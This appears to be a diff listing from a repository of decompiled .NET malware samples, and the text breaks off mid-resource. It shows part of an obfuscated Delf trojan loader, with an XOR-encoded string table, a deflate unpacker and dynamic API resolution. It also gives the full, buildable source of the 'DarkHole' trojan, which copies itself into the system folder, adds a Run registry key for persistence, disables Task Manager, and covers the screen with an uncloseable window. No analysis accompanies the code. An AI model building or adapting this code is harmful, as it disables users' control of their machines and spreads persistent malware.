private static byte[] \u0003([In] byte[] obj0)
{
MemoryStream memoryStream1 = new MemoryStream(obj0);
MemoryStream memoryStream2 = new MemoryStream();
byte[] buffer = new byte[1024];
using (DeflateStream deflateStream = new DeflateStream((Stream) memoryStream1, CompressionMode.Decompress, true))
{
while (true)
{
int count = deflateStream.Read(buffer, 0, buffer.Length);
if (count > 0)
memoryStream2.Write(buffer, 0, count);
else
break;
}
}
return memoryStream2.ToArray();
}
public static byte[] \u0003([In] string obj0, [In] string obj1) => \u0001.\u0003(\u0001.\u0003(Encoding.Default.GetBytes(obj0), obj1));
[DllImport("kernel32", EntryPoint = "GetProcAddress")]
public static extern IntPtr \u0003([In] IntPtr obj0, [In] string obj1);
[DllImport("kernel32", EntryPoint = "GetModuleHandle")]
public static extern IntPtr \u0003([In] string obj0);
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_0005/_0002.cs
+298
View File
@@ -0,0 +1,298 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0005;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0005
{
[StructLayout(LayoutKind.Auto, CharSet = CharSet.Auto)]
internal class \u0002
{
internal static \u0002.\u0001 \u0001;
internal static byte[] \u0001;
internal static string[] \u0001 = new string[15];
private static string \u0003([In] int obj0, [In] int obj1, [In] int obj2)
{
string str = Encoding.Default.GetString(\u0002.\u0001, obj1, obj2);
\u0002.\u0001[obj0] = str;
return str;
}
public static string \u0003() => \u0002.\u0001[0] ?? \u0002.\u0003(0, 0, 12);
public static string \u0004() => \u0002.\u0001[1] ?? \u0002.\u0003(1, 12, 13);
public static string \u0005() => \u0002.\u0001[2] ?? \u0002.\u0003(2, 25, 12);
public static string \u0006() => \u0002.\u0001[3] ?? \u0002.\u0003(3, 37, 12);
public static string \u0007() => \u0002.\u0001[4] ?? \u0002.\u0003(4, 49, 14);
public static string \u0008() => \u0002.\u0001[5] ?? \u0002.\u0003(5, 63, 18);
public static string \u000E() => \u0002.\u0001[7] ?? \u0002.\u0003(7, 110, 14);
public static string \u000F() => \u0002.\u0001[8] ?? \u0002.\u0003(8, 124, 9);
public static string \u0010() => \u0002.\u0001[9] ?? \u0002.\u0003(9, 133, 20);
public static string \u0011() => \u0002.\u0001[10] ?? \u0002.\u0003(10, 153, 14);
public static string \u0012() => \u0002.\u0001[11] ?? \u0002.\u0003(11, 167, 18);
public static string \u0013() => \u0002.\u0001[12] ?? \u0002.\u0003(12, 185, 16);
public static string \u0014() => \u0002.\u0001[13] ?? \u0002.\u0003(13, 201, 16);
public static string \u0015() => \u0002.\u0001[14] ?? \u0002.\u0003(14, 217, 12);
static \u0002()
{
\u0002.\u0001 = new byte[229]
{
(byte) 149,
(byte) 154,
(byte) 142,
(byte) 147,
(byte) 159,
(byte) 151,
(byte) 203,
(byte) 203,
(byte) 216,
(byte) 147,
(byte) 152,
(byte) 153,
(byte) 180,
(byte) 154,
(byte) 158,
(byte) 149,
(byte) 188,
(byte) 138,
(byte) 159,
(byte) 130,
(byte) 159,
(byte) 153,
(byte) 139,
(byte) 140,
(byte) 167,
(byte) 171,
(byte) 139,
(byte) 132,
(byte) 134,
(byte) 177,
(byte) 133,
(byte) 146,
(byte) 177,
(byte) 170,
(byte) 174,
(byte) 190,
(byte) 191,
(byte) 151,
(byte) 183,
(byte) 186,
(byte) 189,
(byte) 133,
(byte) 177,
(byte) 166,
(byte) 189,
(byte) 166,
(byte) 162,
(byte) 178,
(byte) 171,
(byte) 156,
(byte) 165,
(byte) 183,
(byte) 175,
(byte) 164,
(byte) 174,
(byte) 155,
(byte) 163,
(byte) 180,
(byte) 171,
(byte) 176,
(byte) 176,
(byte) 160,
(byte) 165,
(byte) 134,
(byte) 219,
(byte) 203,
(byte) 241,
(byte) 210,
(byte) 222,
(byte) 206,
(byte) 212,
(byte) 220,
(byte) 240,
(byte) 222,
(byte) 216,
(byte) 208,
(byte) 252,
(byte) 210,
(byte) 221,
(byte) 212,
(byte) 239,
(byte) 234,
(byte) 212,
(byte) 221,
(byte) 198,
(byte) 196,
(byte) 218,
(byte) 204,
(byte) 212,
(byte) 137,
(byte) 244,
(byte) 215,
(byte) 205,
(byte) 211,
(byte) 197,
(byte) 211,
(byte) 234,
(byte) 246,
(byte) 249,
(byte) 238,
(byte) 180,
(byte) 201,
(byte) 253,
(byte) 234,
(byte) 249,
(byte) 226,
(byte) 230,
(byte) 246,
(byte) 247,
(byte) 224,
(byte) 211,
(byte) 227,
(byte) 235,
(byte) 238,
(byte) 248,
(byte) 232,
(byte) 218,
(byte) 249,
(byte) 231,
(byte) 234,
(byte) 227,
(byte) 244,
(byte) 247,
(byte) 196,
(byte) 236,
(byte) 247,
(byte) 228,
(byte) 237,
(byte) 18,
(byte) 81,
(byte) 24,
(byte) 17,
(byte) 22,
(byte) 53,
(byte) 12,
(byte) 44,
(byte) 24,
(byte) 26,
(byte) 21,
(byte) 5,
(byte) 36,
(byte) 26,
(byte) 21,
(byte) 6,
(byte) 33,
(byte) 9,
(byte) 63,
(byte) 8,
(byte) 9,
(byte) 31,
(byte) 1,
(byte) 6,
(byte) 8,
(byte) 49,
(byte) 13,
(byte) 23,
(byte) 22,
(byte) 22,
(byte) 1,
(byte) 13,
(byte) 31,
(byte) 51,
(byte) 48,
(byte) 50,
(byte) 57,
(byte) 30,
(byte) 32,
(byte) 14,
(byte) 36,
(byte) 62,
(byte) 32,
(byte) 48,
(byte) 2,
(byte) 33,
(byte) 63,
(byte) 50,
(byte) 43,
(byte) 60,
(byte) 63,
(byte) 0,
(byte) 47,
(byte) 38,
(byte) 39,
(byte) 59,
(byte) 63,
(byte) 0,
(byte) 33,
(byte) 49,
(byte) 22,
(byte) 43,
(byte) 50,
(byte) 36,
(byte) 95,
(byte) 91,
(byte) 127,
(byte) 82,
(byte) 84,
(byte) 79,
(byte) 93,
(byte) 65,
(byte) 66,
(byte) 100,
(byte) 81,
(byte) 65,
(byte) 102,
(byte) 91,
(byte) 66,
(byte) 84,
(byte) 79,
(byte) 75,
(byte) 111,
(byte) 66,
(byte) 68,
(byte) 95,
(byte) 77,
(byte) 81,
(byte) 82,
(byte) 117,
(byte) 65,
(byte) 86,
(byte) 87,
(byte) 78,
(byte) 69,
(byte) 117,
(byte) 118,
(byte) 109,
(byte) 121,
(byte) 124,
(byte) 126
};
for (int index = 0; index < \u0002.\u0001.Length; ++index)
\u0002.\u0001[index] = (byte) ((int) \u0002.\u0001[index] ^ index ^ 1447847678);
}
[StructLayout(LayoutKind.Explicit, Size = 229, Pack = 1)]
private struct \u0001
{
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/_003CModule_003E.cs
+16
View File
@@ -0,0 +1,16 @@
// Decompiled with JetBrains decompiler
// Type: <Module>
// Assembly: Explorer, Version=1.0.0.0, Culture=neutral, PublicKeyToken=1133f7a8419a0062
// MVID: 9EBACA4B-5CC4-4E1D-BB8B-A34A1921D651
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c.exe
using \u0001;
internal class \u003CModule\u003E
{
static \u003CModule\u003E()
{
\u0003.\u0001.\u0003();
\u0002.\u0003();
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/{56732c33-a8ea-48e2-a548-0239f4aa8a0c}
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/D/Trojan.Win32.Delf.cjha-09fdf048be5ee692c4b7f67dcd746d321697af807f132f1e395c35c2bc7d244c/{9ebaca4b-5cc4-4e1d-bb8b-a34a1921d651}
BIN
View File
Binary file not shown.
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/ADarkHole.cs
+94
View File
@@ -0,0 +1,94 @@
// Decompiled with JetBrains decompiler
// Type: DarkHole.ADarkHole
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.IO;
using System.Threading;
using System.Windows.Forms;
namespace DarkHole
{
public class ADarkHole
{
public frmMain frmHole;
public ADarkHole.AElipse Elipse;
public Thread threadProgressiveDarkHole;
public ADarkHole(ref frmMain frmHl)
{
this.Elipse = new ADarkHole.AElipse();
this.threadProgressiveDarkHole = new Thread(new ThreadStart(MainModule.ProgressiveDarkHole));
this.frmHole = frmHl;
this.frmHole.Height = Screen.PrimaryScreen.WorkingArea.Height;
this.frmHole.Width = Screen.PrimaryScreen.WorkingArea.Width;
this.frmHole.Top = 0;
this.frmHole.Left = 0;
this.Elipse.Top = checked ((int) Math.Round(unchecked ((double) this.frmHole.Height / 2.0)));
this.Elipse.Left = checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 2.0)));
this.Elipse.Height = checked ((int) Math.Round(unchecked ((double) this.frmHole.Height / 2.0 + 15.0)));
this.Elipse.Width = checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 2.0 + 15.0)));
this.TaskmanagerLock(true);
this.InfectMachine();
this.DoDarkHole();
Thread progressiveDarkHole = this.threadProgressiveDarkHole;
progressiveDarkHole.IsBackground = true;
progressiveDarkHole.Priority = ThreadPriority.Normal;
progressiveDarkHole.Start();
}
public void DoDarkHole()
{
this.frmHole.Text = Strings.Space(checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 10.0 - (double) "Dark Hole".Length)))) + "Dark Hole";
this.frmHole.BackColor = System.Drawing.Color.Black;
MainModule.SetWindowRgn(this.frmHole.Handle.ToInt32(), MainModule.CreateEllipticRgn(this.Elipse.Left, this.Elipse.Top, this.Elipse.Width, this.Elipse.Height), true);
}
public void DoDarkHole(int Top, int Left, int Height, int Width)
{
this.frmHole.Text = Strings.Space(checked ((int) Math.Round(unchecked ((double) this.frmHole.Width / 10.0 - (double) "Dark Hole".Length)))) + "Dark Hole";
this.frmHole.BackColor = System.Drawing.Color.Black;
MainModule.SetWindowRgn(this.frmHole.Handle.ToInt32(), MainModule.CreateEllipticRgn(Left, Top, Width, Height), true);
}
public void InfectMachine()
{
string str = Environment.SystemDirectory + "\\DarkHole.exe";
if (!File.Exists(str))
File.Copy(Application.ExecutablePath, str);
Registry.LocalMachine.OpenSubKey("SOFTWARE").OpenSubKey("Microsoft").OpenSubKey("Windows").OpenSubKey("CurrentVersion").OpenSubKey("run", true).SetValue("DarkHole", (object) (Environment.SystemDirectory + "\\DarkHole.exe"));
}
public void TaskmanagerLock(bool Locked)
{
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey("SOFTWARE").OpenSubKey("Microsoft").OpenSubKey("Windows").OpenSubKey("CurrentVersion").OpenSubKey("Policies", true);
string[] subKeyNames = registryKey.GetSubKeyNames();
int lowerBound = subKeyNames.GetLowerBound(0);
int upperBound = subKeyNames.GetUpperBound(0);
int index = lowerBound;
while (index <= upperBound)
{
if (StringType.StrCmp(subKeyNames[index], "System", false) != 0)
checked { ++index; }
else
goto label_5;
}
registryKey.CreateSubKey("System");
label_5:
registryKey.OpenSubKey("System", true).SetValue("DisableTaskMgr", (object) -(Locked ? 1 : 0));
}
public struct AElipse
{
public int Width;
public int Height;
public int Top;
public int Left;
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/AssemblyInfo.cs
+13
View File
@@ -0,0 +1,13 @@
using System;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: CLSCompliant(true)]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyDescription("Virtual Dark Hole")]
[assembly: Guid("56E082D2-B802-4403-8999-1B02044F9C6B")]
[assembly: AssemblyTitle("Dark Hole")]
[assembly: AssemblyCopyright("")]
[assembly: AssemblyProduct("Infection")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyVersion("1.0.2863.37165")]
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/MainModule.cs
+41
View File
@@ -0,0 +1,41 @@
// Decompiled with JetBrains decompiler
// Type: DarkHole.MainModule
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using Microsoft.VisualBasic.CompilerServices;
using System.Runtime.InteropServices;
using System.Threading;
namespace DarkHole
{
[StandardModule]
internal sealed class MainModule
{
public static ADarkHole DarkHole;
[DllImport("gdi32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int CreateEllipticRgn(int X1, int Y1, int X2, int Y2);
[DllImport("user32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int SetWindowRgn(int hWnd, int hRgn, bool bRedraw);
[DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
public static extern int RegisterServiceProcess(int dwProcessID, int dwType);
public static void ProgressiveDarkHole()
{
while (MainModule.DarkHole.Elipse.Top > 0)
{
checked { --MainModule.DarkHole.Elipse.Top; }
checked { --MainModule.DarkHole.Elipse.Left; }
checked { ++MainModule.DarkHole.Elipse.Height; }
checked { ++MainModule.DarkHole.Elipse.Width; }
MainModule.DarkHole.DoDarkHole();
Thread.Sleep(300);
}
MainModule.SetWindowRgn(MainModule.DarkHole.frmHole.Handle.ToInt32(), 0, true);
}
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/Trojan.Win32.Disabler.ag.csproj
+50
View File
@@ -0,0 +1,50 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe-->
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<ProjectGuid>{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}</ProjectGuid>
<OutputType>WinExe</OutputType>
<AssemblyName>DarkHole</AssemblyName>
<ApplicationVersion>1.0.2863.37165</ApplicationVersion>
<RootNamespace>DarkHole</RootNamespace>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugSymbols>true</DebugSymbols>
<DebugType>full</DebugType>
<Optimize>false</Optimize>
<OutputPath>bin\Debug\</OutputPath>
<DefineConstants>DEBUG;TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
<PlatformTarget>AnyCPU</PlatformTarget>
<DebugType>pdbonly</DebugType>
<Optimize>true</Optimize>
<OutputPath>bin\Release\</OutputPath>
<DefineConstants>TRACE</DefineConstants>
<ErrorReport>prompt</ErrorReport>
<WarningLevel>4</WarningLevel>
</PropertyGroup>
<ItemGroup>
<Reference Include="Microsoft.VisualBasic" />
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<Compile Include="ADarkHole.cs" />
<Compile Include="frmMain.cs" />
<Compile Include="MainModule.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="frmMain.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/Trojan.Win32.Disabler.ag.sln
+20
View File
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "DarkHole", "Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.csproj", "{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Debug|Any CPU.Build.0 = Debug|Any CPU
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Release|Any CPU.ActiveCfg = Release|Any CPU
{6EA271A7-D36A-4B97-A7DD-83DB3D12BA9D}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/frmMain.cs
+61
View File
@@ -0,0 +1,61 @@
// Decompiled with JetBrains decompiler
// Type: DarkHole.frmMain
// Assembly: DarkHole, Version=1.0.2863.37165, Culture=neutral, PublicKeyToken=null
// MVID: 004179F3-0653-4C47-86BC-65D9EC044824
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b.exe
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Windows.Forms;
namespace DarkHole
{
public class frmMain : Form
{
private IContainer components;
[STAThread]
public static void Main() => Application.Run((Form) new frmMain());
public frmMain()
{
this.Load += new EventHandler(this.Form_Load);
this.Closing += new CancelEventHandler(this.Form_Closing);
this.InitializeComponent();
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
[DebuggerStepThrough]
private void InitializeComponent()
{
Size size = new Size(5, 14);
this.AutoScaleBaseSize = size;
size = new Size(96, 80);
this.ClientSize = size;
this.ControlBox = false;
this.Font = new Font("Tahoma", 8.25f, FontStyle.Regular, GraphicsUnit.Point, (byte) 0);
this.FormBorderStyle = FormBorderStyle.None;
this.Name = nameof (frmMain);
this.ShowInTaskbar = false;
this.StartPosition = FormStartPosition.CenterScreen;
this.Text = "Dark Hole";
this.TopMost = true;
}
private void Form_Load(object sender, EventArgs e)
{
frmMain frmHl = this;
MainModule.DarkHole = new ADarkHole(ref frmHl);
}
private void Form_Closing(object sender, CancelEventArgs e) => e.Cancel = true;
}
}
MSIL/Trojan/Win32/D/Trojan.Win32.Disabler.ag-8f832a067f0cbed927d9eb2ca683e9473f989c4db136e10b5039182fc621175b/frmMain.resx
+150
View File
@@ -0,0 +1,150 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="$this.SnapToGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.TrayLargeIcon" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Name" mimetype="application/x-microsoft.net.object.binary.base64">
<value>B2ZybU1haW4=</value>
</data>
<data name="$this.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAExTeXN0ZW0sIFZlcnNpb249MS4wLjUwMDAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAAAQAAAL</value>
</data>
<data name="$this.Locked" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.DrawGrid" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAQs=</value>
</data>
<data name="$this.Localizable" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAAA5TeXN0ZW0uQm9vbGVhbgEAAAAHbV92YWx1ZQABAAs=</value>
</data>
<data name="$this.Language" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAEAQAAACBTeXN0ZW0uR2xvYmFsaXphdGlvbi5DdWx0dXJlSW5mbwoAAAAGbV9uYW1lCm1fZGF0YUl0ZW0RbV91c2VVc2VyT3ZlcnJpZGUJY3VsdHVyZUlEDG1faXNSZWFkT25seQtjb21wYXJlSW5mbwh0ZXh0SW5mbwdudW1JbmZvDGRhdGVUaW1lSW5mbwhjYWxlbmRhcgEAAAAAAwMDAwMIAQgBIFN5c3RlbS5HbG9iYWxpemF0aW9uLkNvbXBhcmVJbmZvHVN5c3RlbS5HbG9iYWxpemF0aW9uLlRleHRJbmZvJVN5c3RlbS5HbG9iYWxpemF0aW9uLk51bWJlckZvcm1hdEluZm8nU3lzdGVtLkdsb2JhbGl6YXRpb24uRGF0ZVRpbWVGb3JtYXRJbmZvHVN5c3RlbS5HbG9iYWxpemF0aW9uLkNhbGVuZGFyBgIAAAAAygAAAAB/AAAAAQkDAAAACQQAAAAJBQAAAAoKBAMAAAAgU3lzdGVtLkdsb2JhbGl6YXRpb24uQ29tcGFyZUluZm8CAAAACXdpbjMyTENJRAdjdWx0dXJlAAAICH8AAAB/AAAABAQAAAAdU3lzdGVtLkdsb2JhbGl6YXRpb24uVGV4dEluZm8DAAAAC21fbkRhdGFJdGVtEW1fdXNlVXNlck92ZXJyaWRlDW1fd2luMzJMYW5nSUQAAAAIAQjKAAAAAH8AAAAEBQAAACVTeXN0ZW0uR2xvYmFsaXphdGlvbi5OdW1iZXJGb3JtYXRJbmZvHwAAABBudW1iZXJHcm91cFNpemVzEmN1cnJlbmN5R3JvdXBTaXplcxFwZXJjZW50R3JvdXBTaXplcwxwb3NpdGl2ZVNpZ24MbmVnYXRpdmVTaWduFm51bWJlckRlY2ltYWxTZXBhcmF0b3IUbnVtYmVyR3JvdXBTZXBhcmF0b3IWY3VycmVuY3lHcm91cFNlcGFyYXRvchhjdXJyZW5jeURlY2ltYWxTZXBhcmF0b3IOY3VycmVuY3lTeW1ib2wSYW5zaUN1cnJlbmN5U3ltYm9sCW5hblN5bWJvbBZwb3NpdGl2ZUluZmluaXR5U3ltYm9sFm5lZ2F0aXZlSW5maW5pdHlTeW1ib2wXcGVyY2VudERlY2ltYWxTZXBhcmF0b3IVcGVyY2VudEdyb3VwU2VwYXJhdG9yDXBlcmNlbnRTeW1ib2wOcGVyTWlsbGVTeW1ib2wKbV9kYXRhSXRlbRNudW1iZXJEZWNpbWFsRGlnaXRzFWN1cnJlbmN5RGVjaW1hbERpZ2l0cxdjdXJyZW5jeVBvc2l0aXZlUGF0dGVybhdjdXJyZW5jeU5lZ2F0aXZlUGF0dGVybhVudW1iZXJOZWdhdGl2ZVBhdHRlcm4WcGVyY2VudFBvc2l0aXZlUGF0dGVybhZwZXJjZW50TmVnYXRpdmVQYXR0ZXJuFHBlcmNlbnREZWNpbWFsRGlnaXRzCmlzUmVhZE9ubHkRbV91c2VVc2VyT3ZlcnJpZGUVdmFsaWRGb3JQYXJzZUFzTnVtYmVyF3ZhbGlkRm9yUGFyc2VBc0N1cnJlbmN5BwcHAQEBAQEBAQEBAQEBAQEBAAAAAAAAAAAAAAAAAAgICAgICAgICAgICAEBAQEJBgAAAAkHAAAACQYAAAAGCQAAAAErBgoAAAABLQYLAAAAAS4GDAAAAAEsBg0AAAABLAYOAAAAAS4GDwAAAALCpAoGEAAAAANOYU4GEQAAAAhJbmZpbml0eQYSAAAACS1JbmZpbml0eQkLAAAACQwAAAAGFQAAAA